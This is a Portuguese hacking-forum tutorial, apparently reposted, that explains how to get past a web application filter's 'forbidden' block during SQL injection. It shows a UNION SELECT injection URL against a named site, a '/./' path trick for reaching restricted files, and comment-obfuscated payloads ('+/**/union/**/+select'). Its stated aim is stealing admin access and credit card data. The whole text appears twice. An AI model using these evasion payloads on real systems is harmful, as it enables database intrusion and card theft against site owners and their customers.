Tweet
Olá, pessoal neste tutorial eu vou mostrar como burlar o chato erro 'forbidden' ja penso vc fazendo seus scan acha um site vulneravel ai vc coloca no havij e derrepente vem o famoso erro forbidden ai vc perde todo o admin de cc's que vc queria pegar rsrrssrssss..(...) ....continuando, agora eu vou mostrar como é facil burlar esse erro que nem o havij conseguil burlar :*
veja o erro forbidden:
shogansystems*com/product_content*php?id=-124%20union%20all%20select%201,2,3,4,5,6,7,8,9--
Agora vamos vêr como podemos burlar esse erro... Acho que alguns sabem que “/../” faz com que se volte um diretório, e que “/./” não faz nada a não ser continuar no diretório atual. Bom, alguns servidores restringem o acesso a uma URL especifica, ou seja, ele restringe www . exemplo . com . br/secret/passwords .txt, mas não restringe o acesso a URL www*exemplo*com*br/./secret/passwords.txt, por que a segunda URL é diferente, mas vai apontar para o mesmo lugar, dando assim acesso ao arquivo, bastou usar o “/./” e o servidor foi enganado. Com 'SQLI' não é tão diferente..
-
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3,4,5,6,7,8,9-- <<~ com erro forbidden !
-
-
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... <<~ Burlando erro forbidden !!
-
-
ao inveis de vc usar um simples: union all select 1,2,3,4,5,6,7,8,9-- vc usa assim +/**/union/**/+select/**/1,2,3,4....
basta separar os espaços vagos com +/**/ e assim sucessivamente..
-
outra dica tambem é não usar o comando @@version use o version()
é isso ai simples assim de resolver um erro que nem o havij consegue burlar....
Creditos: Dênis_Blackhat
Reescrito por L.henvy
veja o erro forbidden:
shogansystems*com/product_content*php?id=-124%20union%20all%20select%201,2,3,4,5,6,7,8,9--
Agora vamos vêr como podemos burlar esse erro... Acho que alguns sabem que “/../” faz com que se volte um diretório, e que “/./” não faz nada a não ser continuar no diretório atual. Bom, alguns servidores restringem o acesso a uma URL especifica, ou seja, ele restringe www . exemplo . com . br/secret/passwords .txt, mas não restringe o acesso a URL www*exemplo*com*br/./secret/passwords.txt, por que a segunda URL é diferente, mas vai apontar para o mesmo lugar, dando assim acesso ao arquivo, bastou usar o “/./” e o servidor foi enganado. Com 'SQLI' não é tão diferente..
-
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3,4,5,6,7,8,9-- <<~ com erro forbidden !
-
-
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... <<~ Burlando erro forbidden !!
-
-
ao inveis de vc usar um simples: union all select 1,2,3,4,5,6,7,8,9-- vc usa assim +/**/union/**/+select/**/1,2,3,4....
basta separar os espaços vagos com +/**/ e assim sucessivamente..
-
outra dica tambem é não usar o comando @@version use o version()
é isso ai simples assim de resolver um erro que nem o havij consegue burlar....
Creditos: Dênis_Blackhat
Reescrito por L.henvy
Comment